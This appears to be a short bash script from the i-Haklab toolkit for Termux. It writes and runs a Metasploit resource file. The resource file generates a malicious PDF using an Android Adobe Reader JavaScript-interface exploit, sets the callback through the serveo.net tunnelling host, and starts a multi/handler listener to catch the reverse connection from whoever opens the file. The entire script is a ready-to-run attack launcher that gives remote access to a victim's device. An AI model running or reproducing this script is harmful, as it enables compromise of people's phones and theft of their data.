#!/bin/bash
#This file is part of i-Haklab command

if [ -d /data/data/com.termux/files/home/i-Haklab ]; then
        iHAKLAB=/data/data/com.termux/files/home/i-Haklab                                   else
        iHAKLAB=/data/data/com.termux/files/home/storage/external-1/roothome/i-Haklab
fi

source $iHAKLAB/.set/libexec/colors
source $iHAKLAB/.set/var/variables
source $iHAKLAB/.set/functions/functions

printf "$G[-]-> i-Haklab :$W creating pdf file and running handler\n"
echo "use exploit/android/fileformat/adobe_reader_pdf_js_interface" > ~/java/handler/paypdf.rc
echo "set LHOST serveo.net" >> ~/java/handler/paypdf.rc
echo "set LPORT 48263" >> ~/java/handler/paypdf.rc
echo "set FILENAME $2.pdf" >> ~/java/handler/paypdf.rc
echo "run" >> ~/java/handler/paypdf.rc
echo "use exploit/multi/handler" >> ~/java/handler/paypdf.rc
echo "set LHOST $LOCALHOST" >> ~/java/handler/paypdf.rc
echo "set LPORT $LPORT" >> ~/java/handler/paypdf.rc
echo "run" >> ~/java/handler/paypdf.rc

if [ $CHECKROOT = 'root' ]; then
	sudo msfconsole -q -r ~/java/handler/paypdf.rc
else
        msfconsole -q -r ~/java/handler/paypdf.rc
fi
